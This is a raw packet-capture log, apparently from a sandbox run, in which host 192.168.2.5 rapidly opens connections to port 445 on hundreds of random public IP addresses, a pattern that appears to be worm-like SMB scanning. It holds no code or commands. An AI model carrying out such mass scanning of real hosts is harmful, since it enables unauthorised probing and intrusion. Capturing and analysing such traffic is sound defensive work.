                                                        Dec 22, 2022 10:06:23.981909037 CET53657445192.168.2.591.173.225.25
                                                        Dec 22, 2022 10:06:23.982096910 CET53660445192.168.2.516.19.39.237
                                                        Dec 22, 2022 10:06:23.982248068 CET53661445192.168.2.510.21.208.46
                                                        Dec 22, 2022 10:06:23.982342958 CET53662445192.168.2.5189.63.176.203
                                                        Dec 22, 2022 10:06:23.982563019 CET53665445192.168.2.5129.100.240.174
                                                        Dec 22, 2022 10:06:23.982733011 CET53667445192.168.2.540.183.147.240
                                                        Dec 22, 2022 10:06:23.982820034 CET53668445192.168.2.555.168.188.200
                                                        Dec 22, 2022 10:06:23.983071089 CET53670445192.168.2.5159.56.39.181
                                                        Dec 22, 2022 10:06:23.983148098 CET53671445192.168.2.5166.132.16.173
                                                        Dec 22, 2022 10:06:23.983269930 CET53672445192.168.2.538.246.209.155
                                                        Dec 22, 2022 10:06:23.983454943 CET53674445192.168.2.5204.183.75.247
                                                        Dec 22, 2022 10:06:23.983536005 CET53675445192.168.2.527.137.45.98
                                                        Dec 22, 2022 10:06:23.983619928 CET53676445192.168.2.5130.21.183.208
                                                        Dec 22, 2022 10:06:24.019902945 CET4455362238.35.118.6192.168.2.5
                                                        Dec 22, 2022 10:06:24.020021915 CET53622445192.168.2.538.35.118.6
                                                        Dec 22, 2022 10:06:24.020085096 CET53622445192.168.2.538.35.118.6
                                                        Dec 22, 2022 10:06:24.102905989 CET53680445192.168.2.541.203.13.69
                                                        Dec 22, 2022 10:06:24.191777945 CET4455362238.35.118.6192.168.2.5
                                                        Dec 22, 2022 10:06:24.194430113 CET53622445192.168.2.538.35.118.6
                                                        Dec 22, 2022 10:06:24.276225090 CET44553628172.225.79.79192.168.2.5
                                                        Dec 22, 2022 10:06:24.365952015 CET4455362238.35.118.6192.168.2.5
                                                        Dec 22, 2022 10:06:24.366086006 CET53622445192.168.2.538.35.118.6
                                                        Dec 22, 2022 10:06:24.537836075 CET4455362238.35.118.6192.168.2.5
                                                        Dec 22, 2022 10:06:24.680270910 CET52738445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:06:24.789614916 CET53628445192.168.2.5172.225.79.79
                                                        Dec 22, 2022 10:06:25.090466022 CET44553628172.225.79.79192.168.2.5
                                                        Dec 22, 2022 10:06:25.242839098 CET53078445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:06:25.574012995 CET53684445192.168.2.541.203.13.70
                                                        Dec 22, 2022 10:06:25.574722052 CET53685445192.168.2.538.35.118.7
                                                        Dec 22, 2022 10:06:25.577402115 CET53686445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:25.611931086 CET4455368684.7.167.2192.168.2.5
                                                        Dec 22, 2022 10:06:25.612052917 CET53686445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:25.612299919 CET53686445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:25.662594080 CET53688445192.168.2.5106.61.154.46
                                                        Dec 22, 2022 10:06:25.663170099 CET53689445192.168.2.581.187.182.232
                                                        Dec 22, 2022 10:06:25.663738012 CET53690445192.168.2.5173.182.206.229
                                                        Dec 22, 2022 10:06:25.664411068 CET53692445192.168.2.517.1.148.83
                                                        Dec 22, 2022 10:06:25.665189028 CET53693445192.168.2.5145.58.41.36
                                                        Dec 22, 2022 10:06:25.665615082 CET53694445192.168.2.5185.42.166.148
                                                        Dec 22, 2022 10:06:25.666193008 CET53699445192.168.2.581.123.74.138
                                                        Dec 22, 2022 10:06:25.666299105 CET53700445192.168.2.55.30.121.111
                                                        Dec 22, 2022 10:06:25.666374922 CET53701445192.168.2.5172.53.205.189
                                                        Dec 22, 2022 10:06:25.666491985 CET53702445192.168.2.5167.57.228.174
                                                        Dec 22, 2022 10:06:25.666802883 CET53704445192.168.2.5165.220.221.183
                                                        Dec 22, 2022 10:06:25.666943073 CET53705445192.168.2.5126.210.58.56
                                                        Dec 22, 2022 10:06:25.667058945 CET53706445192.168.2.5208.53.89.8
                                                        Dec 22, 2022 10:06:25.667287111 CET53709445192.168.2.573.74.210.126
                                                        Dec 22, 2022 10:06:25.667537928 CET53711445192.168.2.5218.22.210.187
                                                        Dec 22, 2022 10:06:25.667624950 CET53712445192.168.2.5115.84.64.48
                                                        Dec 22, 2022 10:06:25.667870998 CET53714445192.168.2.5202.196.143.216
                                                        Dec 22, 2022 10:06:25.667947054 CET53715445192.168.2.5117.147.26.180
                                                        Dec 22, 2022 10:06:25.668052912 CET53716445192.168.2.520.248.69.178
                                                        Dec 22, 2022 10:06:25.668200016 CET53718445192.168.2.59.60.46.167
                                                        Dec 22, 2022 10:06:25.668298960 CET53719445192.168.2.575.13.191.227
                                                        Dec 22, 2022 10:06:25.668376923 CET53720445192.168.2.511.82.189.221
                                                        Dec 22, 2022 10:06:25.668951988 CET53726445192.168.2.5152.123.54.217
                                                        Dec 22, 2022 10:06:25.669117928 CET53728445192.168.2.571.101.157.47
                                                        Dec 22, 2022 10:06:25.669290066 CET53730445192.168.2.5163.183.231.170
                                                        Dec 22, 2022 10:06:25.669589996 CET53733445192.168.2.527.75.147.148
                                                        Dec 22, 2022 10:06:25.669826984 CET53735445192.168.2.5104.199.54.148
                                                        Dec 22, 2022 10:06:25.670030117 CET53737445192.168.2.556.122.224.182
                                                        Dec 22, 2022 10:06:25.673314095 CET53748445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:25.708275080 CET4455374884.7.167.2192.168.2.5
                                                        Dec 22, 2022 10:06:25.708422899 CET53748445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:25.734926939 CET53748445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:25.746326923 CET4455368538.35.118.7192.168.2.5
                                                        Dec 22, 2022 10:06:25.746440887 CET53685445192.168.2.538.35.118.7
                                                        Dec 22, 2022 10:06:25.746593952 CET53685445192.168.2.538.35.118.7
                                                        Dec 22, 2022 10:06:25.753288984 CET53749445192.168.2.538.35.118.7
                                                        Dec 22, 2022 10:06:25.878961086 CET44553712115.84.64.48192.168.2.5
                                                        Dec 22, 2022 10:06:25.918008089 CET4455368538.35.118.7192.168.2.5
                                                        Dec 22, 2022 10:06:25.918034077 CET4455368538.35.118.7192.168.2.5
                                                        Dec 22, 2022 10:06:25.924843073 CET4455374938.35.118.7192.168.2.5
                                                        Dec 22, 2022 10:06:25.924954891 CET53749445192.168.2.538.35.118.7
                                                        Dec 22, 2022 10:06:25.925021887 CET53749445192.168.2.538.35.118.7
                                                        Dec 22, 2022 10:06:25.945931911 CET53686445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:25.952344894 CET4455373327.75.147.148192.168.2.5
                                                        Dec 22, 2022 10:06:26.008454084 CET53748445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:26.096946955 CET4455374938.35.118.7192.168.2.5
                                                        Dec 22, 2022 10:06:26.099685907 CET53749445192.168.2.538.35.118.7
                                                        Dec 22, 2022 10:06:26.271302938 CET4455374938.35.118.7192.168.2.5
                                                        Dec 22, 2022 10:06:26.271451950 CET53749445192.168.2.538.35.118.7
                                                        Dec 22, 2022 10:06:26.414788008 CET53748445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:26.436835051 CET53712445192.168.2.5115.84.64.48
                                                        Dec 22, 2022 10:06:26.442914009 CET4455374938.35.118.7192.168.2.5
                                                        Dec 22, 2022 10:06:26.618002892 CET53733445192.168.2.527.75.147.148
                                                        Dec 22, 2022 10:06:26.648339033 CET44553712115.84.64.48192.168.2.5
                                                        Dec 22, 2022 10:06:26.649827003 CET53751445192.168.2.541.203.13.71
                                                        Dec 22, 2022 10:06:26.679872036 CET53686445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:26.779975891 CET53762445192.168.2.582.110.62.129
                                                        Dec 22, 2022 10:06:26.780102015 CET53763445192.168.2.5147.225.184.116
                                                        Dec 22, 2022 10:06:26.780249119 CET53765445192.168.2.5158.110.113.46
                                                        Dec 22, 2022 10:06:26.780534029 CET53769445192.168.2.59.76.214.158
                                                        Dec 22, 2022 10:06:26.780567884 CET53771445192.168.2.5174.210.60.58
                                                        Dec 22, 2022 10:06:26.780596972 CET53772445192.168.2.5209.164.192.20
                                                        Dec 22, 2022 10:06:26.780834913 CET53778445192.168.2.5128.15.147.217
                                                        Dec 22, 2022 10:06:26.780906916 CET53779445192.168.2.588.119.214.202
                                                        Dec 22, 2022 10:06:26.781009912 CET53781445192.168.2.5139.96.62.208
                                                        Dec 22, 2022 10:06:26.781132936 CET53783445192.168.2.5148.177.28.98
                                                        Dec 22, 2022 10:06:26.781223059 CET53784445192.168.2.546.38.243.134
                                                        Dec 22, 2022 10:06:26.781311035 CET53786445192.168.2.512.94.42.65
                                                        Dec 22, 2022 10:06:26.781342030 CET53787445192.168.2.5133.153.217.143
                                                        Dec 22, 2022 10:06:26.781708956 CET53792445192.168.2.5149.57.42.145
                                                        Dec 22, 2022 10:06:26.781709909 CET53788445192.168.2.594.132.244.33
                                                        Dec 22, 2022 10:06:26.781797886 CET53793445192.168.2.557.98.78.5
                                                        Dec 22, 2022 10:06:26.781812906 CET53794445192.168.2.564.34.163.10
                                                        Dec 22, 2022 10:06:26.781919003 CET53796445192.168.2.5195.128.229.244
                                                        Dec 22, 2022 10:06:26.781944036 CET53797445192.168.2.598.203.182.187
                                                        Dec 22, 2022 10:06:26.782020092 CET53798445192.168.2.5116.225.160.23
                                                        Dec 22, 2022 10:06:26.782044888 CET53799445192.168.2.5117.114.76.100
                                                        Dec 22, 2022 10:06:26.782546043 CET53806445192.168.2.563.88.223.15
                                                        Dec 22, 2022 10:06:26.784019947 CET53807445192.168.2.594.171.225.22
                                                        Dec 22, 2022 10:06:26.784410000 CET53808445192.168.2.53.238.207.108
                                                        Dec 22, 2022 10:06:26.784447908 CET53810445192.168.2.576.229.17.30
                                                        Dec 22, 2022 10:06:26.784506083 CET53811445192.168.2.5218.19.70.42
                                                        Dec 22, 2022 10:06:26.784544945 CET53809445192.168.2.5193.124.95.253
                                                        Dec 22, 2022 10:06:26.784564972 CET53812445192.168.2.562.143.111.163
                                                        Dec 22, 2022 10:06:26.837915897 CET4455377988.119.214.202192.168.2.5
                                                        Dec 22, 2022 10:06:26.894951105 CET44553792149.57.42.145192.168.2.5
                                                        Dec 22, 2022 10:06:26.900367975 CET4455373327.75.147.148192.168.2.5
                                                        Dec 22, 2022 10:06:27.117899895 CET53748445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:27.415507078 CET53779445192.168.2.588.119.214.202
                                                        Dec 22, 2022 10:06:27.415551901 CET53792445192.168.2.5149.57.42.145
                                                        Dec 22, 2022 10:06:27.472075939 CET4455377988.119.214.202192.168.2.5
                                                        Dec 22, 2022 10:06:27.529071093 CET44553792149.57.42.145192.168.2.5
                                                        Dec 22, 2022 10:06:27.727834940 CET53814445192.168.2.541.203.13.72
                                                        Dec 22, 2022 10:06:27.884311914 CET53818445192.168.2.5124.41.16.6
                                                        Dec 22, 2022 10:06:27.884401083 CET53819445192.168.2.5146.225.104.94
                                                        Dec 22, 2022 10:06:27.884418011 CET53820445192.168.2.5104.5.59.24
                                                        Dec 22, 2022 10:06:27.884617090 CET53824445192.168.2.531.86.189.138
                                                        Dec 22, 2022 10:06:27.884763956 CET53826445192.168.2.5183.52.141.11
                                                        Dec 22, 2022 10:06:27.884766102 CET53823445192.168.2.5215.248.251.147
                                                        Dec 22, 2022 10:06:27.884850025 CET53827445192.168.2.5121.246.152.142
                                                        Dec 22, 2022 10:06:27.884958982 CET53830445192.168.2.5111.90.105.40
                                                        Dec 22, 2022 10:06:27.885062933 CET53832445192.168.2.5109.25.159.220
                                                        Dec 22, 2022 10:06:27.885087967 CET53833445192.168.2.557.93.53.33
                                                        Dec 22, 2022 10:06:27.885337114 CET53837445192.168.2.577.79.96.9
                                                        Dec 22, 2022 10:06:27.885451078 CET53838445192.168.2.5126.118.202.170
                                                        Dec 22, 2022 10:06:27.885457993 CET53840445192.168.2.5122.179.131.218
                                                        Dec 22, 2022 10:06:27.885620117 CET53844445192.168.2.562.38.20.194
                                                        Dec 22, 2022 10:06:27.885730028 CET53845445192.168.2.5177.18.75.47
                                                        Dec 22, 2022 10:06:27.886137009 CET53855445192.168.2.564.0.191.38
                                                        Dec 22, 2022 10:06:27.886230946 CET53857445192.168.2.598.8.92.48
                                                        Dec 22, 2022 10:06:27.886280060 CET53858445192.168.2.558.247.113.93
                                                        Dec 22, 2022 10:06:27.886424065 CET53861445192.168.2.5142.8.43.151
                                                        Dec 22, 2022 10:06:27.886424065 CET53860445192.168.2.5183.85.113.17
                                                        Dec 22, 2022 10:06:27.886583090 CET53863445192.168.2.5141.200.61.175
                                                        Dec 22, 2022 10:06:27.886846066 CET53869445192.168.2.5108.73.28.88
                                                        Dec 22, 2022 10:06:27.888788939 CET53870445192.168.2.58.134.199.54
                                                        Dec 22, 2022 10:06:27.889126062 CET53871445192.168.2.5146.31.198.56
                                                        Dec 22, 2022 10:06:27.889481068 CET53873445192.168.2.5123.116.219.75
                                                        Dec 22, 2022 10:06:27.889487028 CET53872445192.168.2.5125.8.61.174
                                                        Dec 22, 2022 10:06:27.889549017 CET53874445192.168.2.526.132.204.17
                                                        Dec 22, 2022 10:06:27.889614105 CET53875445192.168.2.5149.151.240.36
                                                        Dec 22, 2022 10:06:27.946160078 CET53686445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:28.258734941 CET53078445192.168.2.5155.100.133.1
                                                        Dec 22, 2022 10:06:28.321249008 CET53748445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:28.805942059 CET53878445192.168.2.541.203.13.73
                                                        Dec 22, 2022 10:06:28.994064093 CET53880445192.168.2.534.240.108.156
                                                        Dec 22, 2022 10:06:28.994589090 CET53882445192.168.2.561.80.73.1
                                                        Dec 22, 2022 10:06:28.994754076 CET53883445192.168.2.524.248.117.227
                                                        Dec 22, 2022 10:06:28.995027065 CET53887445192.168.2.532.223.124.144
                                                        Dec 22, 2022 10:06:28.995141983 CET53888445192.168.2.57.17.201.183
                                                        Dec 22, 2022 10:06:28.995287895 CET53890445192.168.2.577.67.187.250
                                                        Dec 22, 2022 10:06:28.995688915 CET53894445192.168.2.566.114.118.195
                                                        Dec 22, 2022 10:06:28.995831966 CET53895445192.168.2.5144.12.241.240
                                                        Dec 22, 2022 10:06:28.996687889 CET53906445192.168.2.5153.60.85.68
                                                        Dec 22, 2022 10:06:28.996764898 CET53907445192.168.2.584.221.85.140
                                                        Dec 22, 2022 10:06:28.996917963 CET53910445192.168.2.5166.56.80.87
                                                        Dec 22, 2022 10:06:28.997147083 CET53914445192.168.2.5165.239.171.43
                                                        Dec 22, 2022 10:06:28.997148037 CET53911445192.168.2.5129.162.164.224
                                                        Dec 22, 2022 10:06:28.997369051 CET53919445192.168.2.5150.231.204.110
                                                        Dec 22, 2022 10:06:28.997562885 CET53921445192.168.2.542.118.131.226
                                                        Dec 22, 2022 10:06:28.997706890 CET53924445192.168.2.524.213.23.145
                                                        Dec 22, 2022 10:06:28.997832060 CET53925445192.168.2.517.119.205.84
                                                        Dec 22, 2022 10:06:28.997915030 CET53928445192.168.2.5193.169.125.116
                                                        Dec 22, 2022 10:06:28.997926950 CET53929445192.168.2.570.103.69.19
                                                        Dec 22, 2022 10:06:28.998040915 CET53930445192.168.2.511.53.35.125
                                                        Dec 22, 2022 10:06:28.998131990 CET53932445192.168.2.533.84.233.224
                                                        Dec 22, 2022 10:06:28.999941111 CET53934445192.168.2.584.128.81.35
                                                        Dec 22, 2022 10:06:29.000091076 CET53935445192.168.2.5196.230.87.88
                                                        Dec 22, 2022 10:06:29.000216007 CET53937445192.168.2.5202.18.223.169
                                                        Dec 22, 2022 10:06:29.000294924 CET53936445192.168.2.5111.214.77.73
                                                        Dec 22, 2022 10:06:29.000324011 CET53938445192.168.2.570.198.111.195
                                                        Dec 22, 2022 10:06:29.000370979 CET53939445192.168.2.564.16.60.30
                                                        Dec 22, 2022 10:06:29.447638035 CET53942445192.168.2.538.35.118.7
                                                        Dec 22, 2022 10:06:29.524389029 CET53748445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:29.620935917 CET4455394238.35.118.7192.168.2.5
                                                        Dec 22, 2022 10:06:29.621078968 CET53942445192.168.2.538.35.118.7
                                                        Dec 22, 2022 10:06:29.621139050 CET53942445192.168.2.538.35.118.7
                                                        Dec 22, 2022 10:06:29.792846918 CET4455394238.35.118.7192.168.2.5
                                                        Dec 22, 2022 10:06:29.794375896 CET53942445192.168.2.538.35.118.7
                                                        Dec 22, 2022 10:06:29.884063005 CET53943445192.168.2.541.203.13.74
                                                        Dec 22, 2022 10:06:29.965976954 CET4455394238.35.118.7192.168.2.5
                                                        Dec 22, 2022 10:06:29.966106892 CET53942445192.168.2.538.35.118.7
                                                        Dec 22, 2022 10:06:30.119627953 CET53946445192.168.2.517.220.5.233
                                                        Dec 22, 2022 10:06:30.120234013 CET53948445192.168.2.548.4.172.245
                                                        Dec 22, 2022 10:06:30.120507002 CET53949445192.168.2.512.56.70.127
                                                        Dec 22, 2022 10:06:30.121464014 CET53953445192.168.2.5123.120.27.19
                                                        Dec 22, 2022 10:06:30.121809006 CET53954445192.168.2.5201.29.213.192
                                                        Dec 22, 2022 10:06:30.122407913 CET53956445192.168.2.520.72.96.142
                                                        Dec 22, 2022 10:06:30.123579025 CET53960445192.168.2.558.39.104.120
                                                        Dec 22, 2022 10:06:30.123827934 CET53961445192.168.2.599.129.177.12
                                                        Dec 22, 2022 10:06:30.125758886 CET53972445192.168.2.5223.52.197.224
                                                        Dec 22, 2022 10:06:30.125998974 CET53973445192.168.2.5215.94.132.99
                                                        Dec 22, 2022 10:06:30.126339912 CET53974445192.168.2.51.148.146.37
                                                        Dec 22, 2022 10:06:30.126843929 CET53976445192.168.2.517.54.41.148
                                                        Dec 22, 2022 10:06:30.127075911 CET53977445192.168.2.560.183.116.121
                                                        Dec 22, 2022 10:06:30.127793074 CET53980445192.168.2.5176.154.21.98
                                                        Dec 22, 2022 10:06:30.128714085 CET53985445192.168.2.547.121.142.39
                                                        Dec 22, 2022 10:06:30.129309893 CET53988445192.168.2.5128.73.49.115
                                                        Dec 22, 2022 10:06:30.129724979 CET53990445192.168.2.5145.101.235.163
                                                        Dec 22, 2022 10:06:30.129909039 CET53991445192.168.2.599.175.218.196
                                                        Dec 22, 2022 10:06:30.130373955 CET53994445192.168.2.5145.250.126.13
                                                        Dec 22, 2022 10:06:30.130561113 CET53995445192.168.2.5110.98.196.136
                                                        Dec 22, 2022 10:06:30.130929947 CET53996445192.168.2.546.143.3.247
                                                        Dec 22, 2022 10:06:30.131401062 CET53998445192.168.2.5160.196.184.196
                                                        Dec 22, 2022 10:06:30.132875919 CET54000445192.168.2.574.57.114.99
                                                        Dec 22, 2022 10:06:30.133758068 CET54001445192.168.2.5222.103.116.229
                                                        Dec 22, 2022 10:06:30.134658098 CET54002445192.168.2.534.213.85.254
                                                        Dec 22, 2022 10:06:30.135391951 CET54003445192.168.2.566.83.145.210
                                                        Dec 22, 2022 10:06:30.136096954 CET54004445192.168.2.563.31.215.76
                                                        Dec 22, 2022 10:06:30.136981964 CET54005445192.168.2.5176.97.249.203
                                                        Dec 22, 2022 10:06:30.137371063 CET4455394238.35.118.7192.168.2.5
                                                        Dec 22, 2022 10:06:30.198849916 CET54007445192.168.2.538.35.118.8
                                                        Dec 22, 2022 10:06:30.352592945 CET53686445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:30.373977900 CET4455400738.35.118.8192.168.2.5
                                                        Dec 22, 2022 10:06:30.374155045 CET54007445192.168.2.538.35.118.8
                                                        Dec 22, 2022 10:06:30.374279976 CET54007445192.168.2.538.35.118.8
                                                        Dec 22, 2022 10:06:30.374744892 CET54009445192.168.2.538.35.118.8
                                                        Dec 22, 2022 10:06:30.546344042 CET4455400938.35.118.8192.168.2.5
                                                        Dec 22, 2022 10:06:30.546468973 CET54009445192.168.2.538.35.118.8
                                                        Dec 22, 2022 10:06:30.546535969 CET54009445192.168.2.538.35.118.8
                                                        Dec 22, 2022 10:06:30.549773932 CET4455400738.35.118.8192.168.2.5
                                                        Dec 22, 2022 10:06:30.549806118 CET4455400738.35.118.8192.168.2.5
                                                        Dec 22, 2022 10:06:30.718615055 CET4455400938.35.118.8192.168.2.5
                                                        Dec 22, 2022 10:06:30.718763113 CET54009445192.168.2.538.35.118.8
                                                        Dec 22, 2022 10:06:30.727730989 CET53748445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:30.890542030 CET4455400938.35.118.8192.168.2.5
                                                        Dec 22, 2022 10:06:30.890790939 CET54009445192.168.2.538.35.118.8
                                                        Dec 22, 2022 10:06:30.946682930 CET54010445192.168.2.541.203.13.75
                                                        Dec 22, 2022 10:06:31.062227964 CET4455400938.35.118.8192.168.2.5
                                                        Dec 22, 2022 10:06:31.244225979 CET54012445192.168.2.5150.104.80.76
                                                        Dec 22, 2022 10:06:31.244888067 CET54013445192.168.2.512.59.83.89
                                                        Dec 22, 2022 10:06:31.245480061 CET54014445192.168.2.5194.114.44.228
                                                        Dec 22, 2022 10:06:31.245974064 CET54015445192.168.2.5122.38.31.56
                                                        Dec 22, 2022 10:06:31.246383905 CET54018445192.168.2.514.18.37.31
                                                        Dec 22, 2022 10:06:31.246613979 CET54020445192.168.2.5210.57.33.82
                                                        Dec 22, 2022 10:06:31.246709108 CET54021445192.168.2.5115.88.131.137
                                                        Dec 22, 2022 10:06:31.247064114 CET54025445192.168.2.548.120.184.83
                                                        Dec 22, 2022 10:06:31.247267962 CET54026445192.168.2.530.74.240.82
                                                        Dec 22, 2022 10:06:31.247509956 CET54028445192.168.2.592.56.126.80
                                                        Dec 22, 2022 10:06:31.247910023 CET54032445192.168.2.532.111.44.133
                                                        Dec 22, 2022 10:06:31.248104095 CET54033445192.168.2.5221.209.170.45
                                                        Dec 22, 2022 10:06:31.248852015 CET54044445192.168.2.5193.181.98.65
                                                        Dec 22, 2022 10:06:31.249031067 CET54045445192.168.2.5192.18.4.126
                                                        Dec 22, 2022 10:06:31.249213934 CET54046445192.168.2.552.23.44.134
                                                        Dec 22, 2022 10:06:31.249337912 CET54048445192.168.2.575.121.146.99
                                                        Dec 22, 2022 10:06:31.249464989 CET54049445192.168.2.5204.109.97.120
                                                        Dec 22, 2022 10:06:31.249686956 CET54052445192.168.2.519.196.92.151
                                                        Dec 22, 2022 10:06:31.250068903 CET54057445192.168.2.5186.172.10.181
                                                        Dec 22, 2022 10:06:31.250427961 CET54060445192.168.2.5120.122.146.249
                                                        Dec 22, 2022 10:06:31.250564098 CET54062445192.168.2.575.122.220.176
                                                        Dec 22, 2022 10:06:31.250653982 CET54063445192.168.2.5219.87.136.167
                                                        Dec 22, 2022 10:06:31.251929045 CET54066445192.168.2.565.1.18.2
                                                        Dec 22, 2022 10:06:31.261228085 CET54067445192.168.2.5132.128.110.237
                                                        Dec 22, 2022 10:06:31.261436939 CET54068445192.168.2.5184.96.76.154
                                                        Dec 22, 2022 10:06:31.261606932 CET54070445192.168.2.568.170.218.5
                                                        Dec 22, 2022 10:06:31.262175083 CET54072445192.168.2.555.57.249.52
                                                        Dec 22, 2022 10:06:31.266254902 CET54073445192.168.2.577.166.68.170
                                                        Dec 22, 2022 10:06:32.009593964 CET54076445192.168.2.541.203.13.76
                                                        Dec 22, 2022 10:06:32.368999004 CET54081445192.168.2.5159.64.212.78
                                                        Dec 22, 2022 10:06:32.369019032 CET54080445192.168.2.5198.187.205.228
                                                        Dec 22, 2022 10:06:32.369259119 CET54083445192.168.2.549.253.219.199
                                                        Dec 22, 2022 10:06:32.369504929 CET54087445192.168.2.538.108.215.24
                                                        Dec 22, 2022 10:06:32.369524002 CET54088445192.168.2.548.2.204.204
                                                        Dec 22, 2022 10:06:32.369699955 CET54090445192.168.2.5185.108.153.163
                                                        Dec 22, 2022 10:06:32.369862080 CET54094445192.168.2.5102.7.208.18
                                                        Dec 22, 2022 10:06:32.369957924 CET54095445192.168.2.554.115.143.138
                                                        Dec 22, 2022 10:06:32.370367050 CET54105445192.168.2.5171.216.25.56
                                                        Dec 22, 2022 10:06:32.370551109 CET54107445192.168.2.5159.250.234.53
                                                        Dec 22, 2022 10:06:32.370620012 CET54108445192.168.2.5118.81.155.20
                                                        Dec 22, 2022 10:06:32.370764971 CET54110445192.168.2.545.178.70.54
                                                        Dec 22, 2022 10:06:32.370961905 CET54112445192.168.2.5144.77.142.228
                                                        Dec 22, 2022 10:06:32.371113062 CET54115445192.168.2.5192.78.229.250
                                                        Dec 22, 2022 10:06:32.371273041 CET54118445192.168.2.5161.93.23.39
                                                        Dec 22, 2022 10:06:32.371427059 CET54121445192.168.2.528.211.227.118
                                                        Dec 22, 2022 10:06:32.371570110 CET54124445192.168.2.596.248.217.44
                                                        Dec 22, 2022 10:06:32.371619940 CET54125445192.168.2.588.218.188.154
                                                        Dec 22, 2022 10:06:32.371937037 CET54128445192.168.2.5134.35.40.249
                                                        Dec 22, 2022 10:06:32.380429983 CET54129445192.168.2.5142.219.19.82
                                                        Dec 22, 2022 10:06:32.380510092 CET54130445192.168.2.560.98.19.252
                                                        Dec 22, 2022 10:06:32.380579948 CET54132445192.168.2.5223.6.233.220
                                                        Dec 22, 2022 10:06:32.380578995 CET54131445192.168.2.572.150.6.234
                                                        Dec 22, 2022 10:06:32.384301901 CET54133445192.168.2.5206.110.229.254
                                                        Dec 22, 2022 10:06:32.384418011 CET54134445192.168.2.5110.210.20.217
                                                        Dec 22, 2022 10:06:32.384763002 CET54136445192.168.2.5169.81.86.253
                                                        Dec 22, 2022 10:06:32.385305882 CET54138445192.168.2.5119.62.17.236
                                                        Dec 22, 2022 10:06:32.385900974 CET54139445192.168.2.571.143.1.9
                                                        Dec 22, 2022 10:06:32.417324066 CET4455412588.218.188.154192.168.2.5
                                                        Dec 22, 2022 10:06:32.417493105 CET54125445192.168.2.588.218.188.154
                                                        Dec 22, 2022 10:06:32.417644978 CET54125445192.168.2.588.218.188.154
                                                        Dec 22, 2022 10:06:32.417804956 CET54140445192.168.2.588.218.188.1
                                                        Dec 22, 2022 10:06:32.463377953 CET4455412588.218.188.154192.168.2.5
                                                        Dec 22, 2022 10:06:32.463432074 CET4455412588.218.188.154192.168.2.5
                                                        Dec 22, 2022 10:06:32.548058987 CET44554129142.219.19.82192.168.2.5
                                                        Dec 22, 2022 10:06:32.548341990 CET54129445192.168.2.5142.219.19.82
                                                        Dec 22, 2022 10:06:32.548492908 CET54129445192.168.2.5142.219.19.82
                                                        Dec 22, 2022 10:06:32.549001932 CET54141445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:32.668067932 CET4455413060.98.19.252192.168.2.5
                                                        Dec 22, 2022 10:06:32.715056896 CET44554141142.219.19.1192.168.2.5
                                                        Dec 22, 2022 10:06:32.715264082 CET54141445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:32.715639114 CET54141445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:32.716624022 CET54143445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:32.882630110 CET44554143142.219.19.1192.168.2.5
                                                        Dec 22, 2022 10:06:32.882885933 CET54143445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:32.883127928 CET54143445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:33.087207079 CET54129445192.168.2.5142.219.19.82
                                                        Dec 22, 2022 10:06:33.087709904 CET54145445192.168.2.541.203.13.77
                                                        Dec 22, 2022 10:06:33.134068966 CET53748445192.168.2.584.7.167.2
                                                        Dec 22, 2022 10:06:33.180982113 CET54130445192.168.2.560.98.19.252
                                                        Dec 22, 2022 10:06:33.274740934 CET54141445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:33.337274075 CET54143445192.168.2.5142.219.19.1
                                                        Dec 22, 2022 10:06:33.468934059 CET4455413060.98.19.252192.168.2.5
                                                        Dec 22, 2022 10:06:33.494499922 CET54147445192.168.2.528.240.241.169
                                                        Dec 22, 2022 10:06:33.494988918 CET54148445192.168.2.528.82.166.54
                                                        Dec 22, 2022 10:06:33.495449066 CET54150445192.168.2.539.200.111.62
                                                        Dec 22, 2022 10:06:33.497262001 CET54152445192.168.2.5189.16.143.141
                                                        Dec 22, 2022 10:06:33.498748064 CET54153445192.168.2.551.4.113.150
                                                        Dec 22, 2022 10:06:33.499727011 CET54156445192.168.2.5109.211.146.137
                                                        Dec 22, 2022 10:06:33.500092983 CET54157445192.168.2.521.159.142.59
                                                        Dec 22, 2022 10:06:33.500724077 CET54160445192.168.2.5102.131.213.22
                                                        Dec 22, 2022 10:06:33.501532078 CET54163445192.168.2.570.3.85.34
                                                        Dec 22, 2022 10:06:33.501763105 CET54164445192.168.2.5207.112.140.20
                                                        Dec 22, 2022 10:06:33.502439976 CET54166445192.168.2.5184.48.114.187
                                                        Dec 22, 2022 10:06:33.503768921 CET54170445192.168.2.595.66.142.35
                                                        Dec 22, 2022 10:06:33.504198074 CET54171445192.168.2.527.251.43.0
                                                        Dec 22, 2022 10:06:33.506859064 CET54181445192.168.2.5204.188.127.74
                                                        Dec 22, 2022 10:06:33.507285118 CET54183445192.168.2.5110.118.165.4
                                                        Dec 22, 2022 10:06:33.507725000 CET54184445192.168.2.5175.82.130.230
                                                        Dec 22, 2022 10:06:33.507798910 CET54186445192.168.2.5219.77.148.224
                                                        Dec 22, 2022 10:06:33.508140087 CET54189445192.168.2.563.156.219.216
                                                        Dec 22, 2022 10:06:33.508374929 CET54192445192.168.2.557.239.209.254
                                                        Dec 22, 2022 10:06:33.508615017 CET54195445192.168.2.5167.106.37.234
